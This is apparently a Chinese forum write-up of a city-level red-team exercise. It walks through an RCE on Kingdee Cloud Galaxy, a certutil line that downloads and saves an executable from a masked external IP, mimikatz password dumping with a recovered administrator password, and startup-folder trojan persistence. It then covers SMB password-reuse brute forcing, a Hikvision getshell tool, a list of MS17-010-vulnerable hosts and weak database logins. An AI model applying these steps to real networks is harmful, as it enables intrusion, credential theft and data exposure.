记某次极为顺畅的实战案例

金蝶云星空RCE

shell之后尝试上线(出网)
certutil -urlcache -split -f http://xx.xx.xx.xx/test.exe c:\test.exe
这里exe的位置只是一个示例,正常都是在tmp目录下的
有CS的话,就上传frp

本机信息收集

上传mimikatz收集密码本
mimikatz收集密码

get一个密码,乍一看还有域
administrator/@qweadmin5656
之后在翻取文件的地方,发现有个密码HAO&^&123

维权

这里因为是简单的市护网,没人应急,维权就把exe的木马文件放到启动目录下
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

内网横向

之后就是fscan的扫描
先简单的使用密码本进行横向扫描,针对445端口进行密码复用的爆破。
因为SMB密码和RDP的密码是一样的。并且SMB的爆破速度比RDP更快。
这里获取了大概五六个权限,就可以放开去扫了

图片[1]-记某次极为顺畅的实战案例-山海云端论坛

内网中扫描到一些 海康威视综合安防管理平台
https://github.com/Tas9er/HikvisionIVMSGetShell 换上Gazila的shell
地址为https://xxx.xxx.xxx/abcd.jsp;js

图片[2]-记某次极为顺畅的实战案例-山海云端论坛

一堆永恒之蓝,直接msf梭哈就行,但是命令执行多了容易崩

[+] 172.21.3x.3x MS17-010 (Windows Server 2008 R2 Enterprise 7601 Servic
e Pack 1)
[+] 172.21.3x.1x MS17-010 (Windows Server 2016 Standard 14393)
[+] 172.21.3x.x9 MS17-010 (Windows Server 2012 R2 Standard 9600)
[+] 172.21.1×9.2×7 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.21.1×0.2x MS17-010 (Windows 7 Enterprise 7600)
[+] 172.21.1×9.6x MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.21.1×0.1×0 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 172.21.1×0.1×6 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 172.21.1×3.2×5 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.21.1×0.1×3 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 172.21.1×2.x34 MS17-010 (Windows 7 Enterprise 7600)
[+] 172.21.1×9.x28 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.21.1×0.x63 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 172.21.3x.5x MS17-010 (Windows Server 2012 R2 Datacenter 9600)
[+] 172.21.1×9.x7 MS17-010 (Windows 7 Ultimate 7601 Service Pack 1)
[+] 172.21.1×0.x32 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[+] 172.21.3x.x1 MS17-010 (Windows Server 2012 R2 Standard 9600)

数据库弱口令,比如root/root(mysql),sa/123456(mssql ),redis未授权按,大概十几个数据库,几十万数据,就不一一放截图了。

图片[3]-记某次极为顺畅的实战案例-山海云端论坛
© 版权声明
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容